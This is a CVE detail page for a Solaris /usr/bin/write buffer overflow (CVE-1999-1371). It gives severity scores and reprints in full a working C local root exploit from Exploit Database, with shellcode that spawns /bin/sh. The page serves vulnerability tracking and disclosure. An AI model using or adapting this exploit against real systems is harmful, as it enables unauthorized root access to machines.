CVE-1999-1371 : Detail

CVE-1999-1371

0.04%V3
Local
2001-09-12
02h00 +00:00
2024-08-01
17h11 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in /usr/bin/write in Solaris 2.6 and 7 allows local users to gain privileges via a long string in the terminal name argument.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 256

Publication date : 2001-01-24 23h00 +00:00
Author : Pablo Sor
EDB Verified : Yes

#include <stdio.h> #include <unistd.h> /* /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp [shell_offset] [ret_addr_offset] default offset should work. */ long get_esp() { __asm__("movl %esp,%eax"); } char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46" "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0" "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52" "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff" "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08" "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b" "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8" "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; /* shellcode by Cheez Whiz */ void main(int argc,char **argv) { FILE *fp; long magic,magicret; char buf[100],*envi; int i; envi = (char *) malloc(1000*sizeof(char)); memset(envi,0x90,1000); memcpy(envi,"SOR=",4); memcpy(envi+980-strlen(shell),shell,strlen(shell)); envi[1000]=0; putenv(envi); if (argc!=3) { magicret = get_esp()+116; magic = get_esp()-1668; } else { magicret = get_esp()+atoi(argv[1]); magic = get_esp()+atoi(argv[2]); } memset(buf,0x41,100); buf[99]=0; memcpy(buf+91,&magic,4); for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4); execl("/usr/bin/write","write","root",buf,(char *)0); } // milw0rm.com [2001-01-25]

Products Mentioned

Configuraton 0

Sun>>Sunos >> Version -

Sun>>Sunos >> Version 5.5.1

Sun>>Sunos >> Version 5.7

References

http://marc.info/?l=bugtraq&m=92100752221493&w=2
Tags : mailing-list, x_refsource_BUGTRAQ